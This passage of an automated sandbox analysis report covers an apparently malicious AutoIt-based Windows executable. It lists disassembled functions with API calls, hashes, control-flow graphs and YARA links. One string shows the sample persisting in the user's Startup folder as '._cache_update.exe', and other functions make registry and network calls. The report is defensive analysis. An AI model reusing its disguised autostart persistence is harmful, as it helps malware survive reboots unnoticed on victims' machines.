                                                                                                                                • Instruction Fuzzy Hash: C8C04CB240400DDFC715DB80C985AEFB7BCBB04300F204096A115E1010D7749B45AB71
                                                                                                                                Function 00F1E1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1E279
                                                                                                                                • timeGetTime.WINMM ref: 00F1E51A
                                                                                                                                • TranslateMessage.USER32(?), ref: 00F1E646
                                                                                                                                • DispatchMessageW.USER32(?), ref: 00F1E651
                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1E664
                                                                                                                                • LockWindowUpdate.USER32(00000000), ref: 00F1E697
                                                                                                                                • DestroyWindow.USER32 ref: 00F1E6A3
                                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1E6BD
                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00F85B15
                                                                                                                                • TranslateMessage.USER32(?), ref: 00F862AF
                                                                                                                                • DispatchMessageW.USER32(?), ref: 00F862BD
                                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F862D1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                • API String ID: 2641332412-570651680
                                                                                                                                • Opcode ID: 5e48c1fb87bf133bd7588103f49d893c84410d03eb70ef0b44beebb76b1671e8
                                                                                                                                • Instruction ID: 7b81bd31aa1418869a02993f11496503dc2d5667355e513555a39dbb6b0506a2
                                                                                                                                • Opcode Fuzzy Hash: 5e48c1fb87bf133bd7588103f49d893c84410d03eb70ef0b44beebb76b1671e8
                                                                                                                                • Instruction Fuzzy Hash: DC6204719043409FDB20EF24CC95BEA77E5BF44714F18486EF9468B292DB74D888EB52
                                                                                                                                Function 00F46A28 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • ___createFile.LIBCMT ref: 00F46C73
                                                                                                                                • ___createFile.LIBCMT ref: 00F46CB4
                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00F46CDD
                                                                                                                                • __dosmaperr.LIBCMT ref: 00F46CE4
                                                                                                                                • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00F46CF7
                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00F46D1A
                                                                                                                                • __dosmaperr.LIBCMT ref: 00F46D23
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00F46D2C
                                                                                                                                • __set_osfhnd.LIBCMT ref: 00F46D5C
                                                                                                                                • __lseeki64_nolock.LIBCMT ref: 00F46DC6
                                                                                                                                • __close_nolock.LIBCMT ref: 00F46DEC
                                                                                                                                • __chsize_nolock.LIBCMT ref: 00F46E1C
                                                                                                                                • __lseeki64_nolock.LIBCMT ref: 00F46E2E
                                                                                                                                • __lseeki64_nolock.LIBCMT ref: 00F46F26
                                                                                                                                • __lseeki64_nolock.LIBCMT ref: 00F46F3B
                                                                                                                                • __close_nolock.LIBCMT ref: 00F46F9B
                                                                                                                                  • Part of subcall function 00F3F84C: CloseHandle.KERNEL32(00000000,00FBEEC4,00000000,?,00F46DF1,00FBEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00F3F89C
                                                                                                                                  • Part of subcall function 00F3F84C: GetLastError.KERNEL32(?,00F46DF1,00FBEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00F3F8A6
                                                                                                                                  • Part of subcall function 00F3F84C: __free_osfhnd.LIBCMT ref: 00F3F8B3
                                                                                                                                  • Part of subcall function 00F3F84C: __dosmaperr.LIBCMT ref: 00F3F8D5
                                                                                                                                  • Part of subcall function 00F3889E: __getptd_noexit.LIBCMT ref: 00F3889E
                                                                                                                                • __lseeki64_nolock.LIBCMT ref: 00F46FBD
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00F470F2
                                                                                                                                • ___createFile.LIBCMT ref: 00F47111
                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00F4711E
                                                                                                                                • __dosmaperr.LIBCMT ref: 00F47125
                                                                                                                                • __free_osfhnd.LIBCMT ref: 00F47145
                                                                                                                                • __invoke_watson.LIBCMT ref: 00F47173
                                                                                                                                • __wsopen_helper.LIBCMT ref: 00F4718D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                • String ID: @
                                                                                                                                • API String ID: 3896587723-2766056989
                                                                                                                                • Opcode ID: ee82be86791cd855f9d44f3f5a53f70aaec1280387f72ac0cd5c0059b4a2e9f4
                                                                                                                                • Instruction ID: acfb2a38f55c95c9ab67abaf618e2b6718738f6a0bff1c23c92ac035e6794a60
                                                                                                                                • Opcode Fuzzy Hash: ee82be86791cd855f9d44f3f5a53f70aaec1280387f72ac0cd5c0059b4a2e9f4
                                                                                                                                • Instruction Fuzzy Hash: A222E272D042099BEB259F68DC91BAE7F61EB46334F284229ED11EB2D1C7398D40F752
                                                                                                                                Function 00F576DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 00F576ED
                                                                                                                                • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00F57713
                                                                                                                                • _wcscpy.LIBCMT ref: 00F57741
                                                                                                                                • _wcscmp.LIBCMT ref: 00F5774C
                                                                                                                                • _wcscat.LIBCMT ref: 00F57762
                                                                                                                                • _wcsstr.LIBCMT ref: 00F5776D
                                                                                                                                • 74D41560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00F57789
                                                                                                                                • _wcscat.LIBCMT ref: 00F577D2
                                                                                                                                • _wcscat.LIBCMT ref: 00F577D9
                                                                                                                                • _wcsncpy.LIBCMT ref: 00F57804
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _wcscat$FileInfoVersion$D41560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                • API String ID: 716990576-1459072770
                                                                                                                                • Opcode ID: 7806c24c487138a57b9862e3d88be089048785e10954ce78b5d4325ce515787e
                                                                                                                                • Instruction ID: e10a73ebfd82185ba11885ffd8121a123408153e7595e6fa15d7d77848dc21ad
                                                                                                                                • Opcode Fuzzy Hash: 7806c24c487138a57b9862e3d88be089048785e10954ce78b5d4325ce515787e
                                                                                                                                • Instruction Fuzzy Hash: 3341F872904304BAE701B774AC47FBF77ACEF55731F10005AF901A6192EB68EA05F6A2
                                                                                                                                Function 00F11F04 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 608 f11f04-f11f9c call f12d1a * 2 call f1c935 * 2 call f17e53 call f1d3d2 * 3 625 f82569-f82575 call f32626 608->625 626 f11fa2-f11fa6 608->626 628 f8257d-f82583 call f4e4ea 625->628 626->628 629 f11fac-f11faf 626->629 632 f8258f-f8259b call f1a4f6 628->632 631 f11fb5-f11fb8 629->631 629->632 631->632 634 f11fbe-f11fc7 GetForegroundWindow call f1200a 631->634 640 f82899-f8289d 632->640 641 f825a1-f825b1 call f1a4f6 632->641 639 f11fcc-f11fe3 call f1197e 634->639 654 f11fe4-f12007 call f15cd3 * 3 639->654 643 f828ab-f828ae 640->643 644 f8289f-f828a6 call f1c935 640->644 641->640 653 f825b7-f825c5 641->653 648 f828b0 643->648 649 f828b7-f828c4 643->649 644->643 648->649 651 f828d6-f828da 649->651 652 f828c6-f828d4 call f1b8a7 CharUpperBuffW 649->652 657 f828dc-f828df 651->657 658 f828f1-f828fa 651->658 652->651 656 f825c9-f825e1 call f4d68d 653->656 656->640 670 f825e7-f825f7 call f2f885 656->670 657->658 662 f828e1-f828ef call f1b8a7 CharUpperBuffW 657->662 663 f8290b EnumWindows 658->663 664 f828fc-f82909 GetDesktopWindow EnumChildWindows 658->664 662->658 668 f82911-f82930 call f4e44e call f12d1a 663->668 664->668 683 f82940 668->683 684 f82932-f8293b call f1200a 668->684 680 f8287b-f8288b call f2f885 670->680 681 f825fd-f8260d call f2f885 670->681 690 f8288d-f82891 680->690 691 f82873-f82876 680->691 692 f82861-f82871 call f2f885 681->692 693 f82613-f82623 call f2f885 681->693 684->683 690->654 695 f82897 690->695 692->691 700 f82842-f82848 GetForegroundWindow 692->700 701 f82629-f82639 call f2f885 693->701 702 f8281d-f82836 call f588a2 IsWindow 693->702 698 f82852-f82858 695->698 698->692 704 f82849-f82850 call f1200a 700->704 709 f82659-f82669 call f2f885 701->709 710 f8263b-f82640 701->710 702->654 711 f8283c-f82840 702->711 704->698 720 f8267a-f8268a call f2f885 709->720 721 f8266b-f82675 709->721 713 f8280d-f8280f 710->713 714 f82646-f82657 call f15cf6 710->714 711->704 717 f82817-f82818 713->717 722 f8269b-f826a7 call f15be9 714->722 717->654 729 f8268c-f82698 call f15cf6 720->729 730 f826b5-f826c5 call f2f885 720->730 723 f827e6-f827f0 call f1c935 721->723 732 f826ad-f826b0 722->732 733 f82811-f82813 722->733 736 f82804-f82808 723->736 729->722 739 f826e3-f826f3 call f2f885 730->739 740 f826c7-f826de call f32241 730->740 732->736 733->717 736->656 745 f82711-f82721 call f2f885 739->745 746 f826f5-f8270c call f32241 739->746 740->736 751 f8273f-f8274f call f2f885 745->751 752 f82723-f8273a call f32241 745->752 746->736 757 f8276d-f8277d call f2f885 751->757 758 f82751-f82768 call f32241 751->758 752->736 763 f8277f-f82793 call f32241 757->763 764 f82795-f827a5 call f2f885 757->764 758->736 763->736 769 f827c3-f827d3 call f2f885 764->769 770 f827a7-f827b7 call f2f885 764->770 776 f827f2-f82802 call f4d614 769->776 777 f827d5-f827da 769->777 770->691 775 f827bd-f827c1 770->775 775->736 776->691 776->736 779 f827dc-f827e2 777->779 780 f82815 777->780 779->723 780->717
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F17E53: _memmove.LIBCMT ref: 00F17EB9
                                                                                                                                • GetForegroundWindow.USER32 ref: 00F11FBE
                                                                                                                                • IsWindow.USER32(?), ref: 00F8282E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Foreground_memmove
                                                                                                                                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                • API String ID: 3828923867-1919597938
                                                                                                                                • Opcode ID: 001e8e49c0fc9122b650658ba4c63ae0b893db12fb49e9f5c7248d0344b0396e
                                                                                                                                • Instruction ID: 218bafe2a8427917c373e8044c7c3b392bf416de2e0eeaf40e202b5565b4d04a
                                                                                                                                • Opcode Fuzzy Hash: 001e8e49c0fc9122b650658ba4c63ae0b893db12fb49e9f5c7248d0344b0396e
                                                                                                                                • Instruction Fuzzy Hash: 1CD1C630504602DBCB44EF24C881AEABBB1FF54350F144A2EF456575A2DB34F99AFB92
                                                                                                                                Function 00F14257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,00000000,00000001,00000000), ref: 00F1428C
                                                                                                                                  • Part of subcall function 00F1CAEE: _memmove.LIBCMT ref: 00F1CB2F
                                                                                                                                  • Part of subcall function 00F31BC7: __wcsicmp_l.LIBCMT ref: 00F31C50
                                                                                                                                • _wcscpy.LIBCMT ref: 00F143C0
                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00F8214E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe$CMDLINE$CMDLINERAW
                                                                                                                                • API String ID: 861526374-1727565619
                                                                                                                                • Opcode ID: 1cba9f28347fbc1e2364ca824581d1a73c1481acb9072018a3fd9bb65f3963ad
                                                                                                                                • Instruction ID: 9727a6e7430fee827c2ae95d15796c8208526833f3ed15a11cd7576abe0afedd
                                                                                                                                • Opcode Fuzzy Hash: 1cba9f28347fbc1e2364ca824581d1a73c1481acb9072018a3fd9bb65f3963ad
                                                                                                                                • Instruction Fuzzy Hash: A1817272900119AACB05EBE0DD52EEFB7BDBF55350F600016E501B7181EF647A84EBA2
                                                                                                                                Function 00F578EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 934 f578ee-f57911 WSAStartup 935 f57917-f57938 gethostname gethostbyname 934->935 936 f579b1-f579bd call f31943 934->936 935->936 937 f5793a-f57941 935->937 945 f579be-f579c1 936->945 939 f57943 937->939 940 f5794e-f57950 937->940 942 f57945-f5794c 939->942 943 f57961-f579a6 call f2faa0 inet_ntoa call f33220 call f58553 call f31943 call f3017e 940->943 944 f57952-f5795f call f31943 940->944 942->940 942->942 951 f579a9-f579af WSACleanup 943->951 944->951 951->945
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                • String ID: 0.0.0.0
                                                                                                                                • API String ID: 208665112-3771769585
                                                                                                                                • Opcode ID: 5d9e5577a1a090b269d31d383ff16f20d7e69738e3d17c7a997a5edc2bf8afa2
                                                                                                                                • Instruction ID: 9fb88266c73e388ad284dd4aa0ac0c3f88f0e7e01bce27e0cd3428f0e09b1a75
                                                                                                                                • Opcode Fuzzy Hash: 5d9e5577a1a090b269d31d383ff16f20d7e69738e3d17c7a997a5edc2bf8afa2
                                                                                                                                • Instruction Fuzzy Hash: A2112731908219ABCB20B770AC0AFDE337CEF04731F100066F90996091EF74DA85A671
                                                                                                                                Function 00F2E975 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 170COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00F2EA39
                                                                                                                                • __wsplitpath.LIBCMT ref: 00F2EA56
                                                                                                                                  • Part of subcall function 00F3297D: __wsplitpath_helper.LIBCMT ref: 00F329BD
                                                                                                                                • _wcsncat.LIBCMT ref: 00F2EA69
                                                                                                                                • __makepath.LIBCMT ref: 00F2EA85
                                                                                                                                  • Part of subcall function 00F32BFF: __wmakepath_s.LIBCMT ref: 00F32C13
                                                                                                                                  • Part of subcall function 00F3010A: std::exception::exception.LIBCMT ref: 00F3013E
                                                                                                                                  • Part of subcall function 00F3010A: __CxxThrowException@8.LIBCMT ref: 00F30153
                                                                                                                                • _wcscpy.LIBCMT ref: 00F2EABE
                                                                                                                                  • Part of subcall function 00F2EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00F2EADA,?,?), ref: 00F2EB27
                                                                                                                                • _wcscat.LIBCMT ref: 00F832FC
                                                                                                                                • _wcscat.LIBCMT ref: 00F83334
                                                                                                                                • _wcsncpy.LIBCMT ref: 00F83370
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                                • String ID: Include$\
                                                                                                                                • API String ID: 1213536620-3429789819
                                                                                                                                • Opcode ID: 62df652198a99e21ca7db3cd61ea3dbb478feba502682b30f0c1f349d2330274
                                                                                                                                • Instruction ID: 488511eb23e4fcf09ea09a88cf4f5be768d0f58cf02a46d8e3bc045be69ab80e
                                                                                                                                • Opcode Fuzzy Hash: 62df652198a99e21ca7db3cd61ea3dbb478feba502682b30f0c1f349d2330274
                                                                                                                                • Instruction Fuzzy Hash: C35191B24063049BC344EF79EC85C9AB7E9FB69310F40052FF54583261EB789644EBA6
                                                                                                                                Function 00F7352A Relevance: 16.2, APIs: 3, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1008 f7352a-f73569 call f1d3d2 * 3 1015 f73574-f735e7 call f184a6 call f73d7b call f73af7 1008->1015 1016 f7356b-f7356e 1008->1016 1030 f73612-f73617 1015->1030 1031 f735e9-f735f4 call f5d7e4 1015->1031 1016->1015 1017 f735f9-f7360d call f22570 1016->1017 1023 f73a94-f73ab7 call f15cd3 * 3 1017->1023 1032 f7366d 1030->1032 1033 f73619-f7362e RegConnectRegistryW 1030->1033 1031->1017 1039 f73671-f7369c RegCreateKeyExW 1032->1039 1036 f73667-f7366b 1033->1036 1037 f73630-f73662 call f17ba9 call f5d7e4 call f22570 1033->1037 1036->1039 1037->1023 1042 f736e7-f736ec 1039->1042 1043 f7369e-f736d2 call f17ba9 call f5d7e4 call f22570 1039->1043 1046 f736f2-f73715 call f184a6 call f31bc7 1042->1046 1047 f73a7b-f73a8c 1042->1047 1043->1023 1067 f736d8-f736e2 1043->1067 1063 f73717-f7376d call f184a6 call f318fb call f184a6 * 2 1046->1063 1064 f73796-f737b6 call f184a6 call f31bc7 1046->1064 1047->1023 1055 f73a8e 1047->1055 1055->1023 1063->1047 1095 f73773-f73791 call f17ba9 call f22570 1063->1095 1076 f73840-f73860 call f184a6 call f31bc7 1064->1076 1077 f737bc-f73814 call f184a6 call f318fb call f184a6 * 2 RegSetValueExW 1064->1077 1067->1023 1089 f73866-f738c9 call f184a6 call f3010a call f184a6 call f13b1e 1076->1089 1090 f73949-f73969 call f184a6 call f31bc7 1076->1090 1077->1047 1108 f7381a-f7383b call f17ba9 call f22570 1077->1108 1127 f738cb-f738d0 1089->1127 1128 f738e9-f73918 call f184a6 1089->1128 1109 f739c6-f739e6 call f184a6 call f31bc7 1090->1109 1110 f7396b-f7398b call f1cdb4 call f184a6 1090->1110 1117 f73a74 1095->1117 1108->1047 1134 f73a13-f73a30 call f184a6 call f31bc7 1109->1134 1135 f739e8-f73a0e call f1d00b call f184a6 1109->1135 1136 f7398d-f739a1 1110->1136 1117->1047 1131 f738d2-f738d4 1127->1131 1132 f738d8-f738db 1127->1132 1151 f7393d-f73944 call f3017e 1128->1151 1152 f7391a-f73936 call f17ba9 call f22570 1128->1152 1131->1132 1132->1127 1137 f738dd-f738df 1132->1137 1156 f73a67-f73a71 call f22570 1134->1156 1157 f73a32-f73a60 call f5be47 call f184a6 call f5be8a 1134->1157 1135->1136 1136->1047 1148 f739a7-f739c1 call f17ba9 call f22570 1136->1148 1137->1128 1142 f738e1-f738e5 1137->1142 1142->1128 1148->1117 1151->1047 1152->1151 1156->1117 1157->1156
                                                                                                                                APIs
                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F73626
                                                                                                                                • RegCreateKeyExW.KERNEL32(?,?,00000000,00FADBF0,00000000,?,00000000,?,?), ref: 00F73694
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ConnectCreateRegistry
